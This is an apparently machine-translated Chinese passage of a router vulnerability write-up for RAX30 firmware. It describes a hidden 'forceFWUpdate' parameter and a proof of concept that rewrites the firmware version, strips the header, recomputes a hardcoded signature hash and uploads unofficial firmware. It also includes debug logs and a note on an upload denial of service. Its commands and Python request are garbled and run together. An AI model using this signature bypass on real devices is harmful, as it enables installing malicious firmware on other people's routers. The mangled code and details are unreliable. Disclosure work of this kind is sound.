向设备上传固态图像更新时,可提供隐藏的“forstewdate”参数强制升级完成并绕过某些验证检查终端用户可用此向设备上传修改式非官方和潜在恶意固件
概念证明,我们下载固件V1.0.9.92_1并修改为V9.9.99_9
ed-i-es/V1.0.9.92_1/V9.9.99_9/g./RAX30.img
下一步,我们剥去页眉值获取原图像,在此例中,长76字节创建固件签名时使用硬编码值
difs=./RAX30.imgs=imagebs=1cotts=76dd
合并相关数据生成所需hash
#cat sha_headheader_note_hash图像sha_tail
以以上hash值更新头并重加到“image”。固件现在会视它为适当签名固件图像
POC演示成功上传
#####
导入请求bunb0_url=http://123.123.123.1:80/cgi-bin/rex_cgi?function=forceFWUpdate&csrftoken=139193467burp0_cookies={sessions72RmsEzn78dq4IrBXCBOWxbP8bGmo1klb0_headerss={ser-Agent}:Mozilla/5.0英特尔 MacOSX10.15Gecko20100101Firefox/1080.q=0.01,accept-Language:en-USenq=0.5,accept-Encodinghttp://123.123.123.1基本YWWTAW46TGFEFZCZE=,联通http://123.123.123.1/UPG_.html升级文件={{mtenFWUPload}开版请求.(burp0_url, headers=burp0_headers, cookies=burp0_cookies, files=files)
#####
路由器显示日志成功上传
#####
CGI_DEBUG>cgi_main.c:427:输入CGICGI_DEBUG> cgi_main.c:293: pData->pBoundryStr="676f250848d2deaec8af8b22701d2fCGI_DEBUG>cgi_main.c.453:env.reqUri/cgi_cgiCGI_DEBUG>cgi_main.c:454:env.petQueryStringCsrftoken=139196467CGI_DEBUG>cgi_main.c:467进程上传文件CGI_DEBUG>cgi_upload.c:1165内容=Len=67936077上传类型=1rm:无法删除 '/tm/fw/guiCL676f250848d2deaec8af8b22701d2fCGI_DEBUG>c:645文件名CGI_image.imgCGI_ERROR>cgi_upload.c:66SizeEst=67936043CGI_DEBUG>cgi_upload.c:673CGI_DEBUG>cgi_upload.c:713:13272字节分配图象数据CGI_DEBUG>CGI_Upload.c:947:262144字节分配到 0xb6535018CGI_DEBUG>cgi_upload.c:948CGI_DEBUG>cgi_upload.c:377:在67935957字集CGI_DEBUG>cgi_upload.c:800后LC=0676f250848d2deaec8af8b22701d2fCGI_DEBUG>c:820:发现端边界CGI_DEBUG>cgi_upload.c:834:查找边界有效BlockSize171693
#####
文件上传拒绝服务-CVE2023-283
请求发送设备网络服务包含多端=的Centent-Type足够大文件会耗竭设备资源,导致设备无法使用直到重开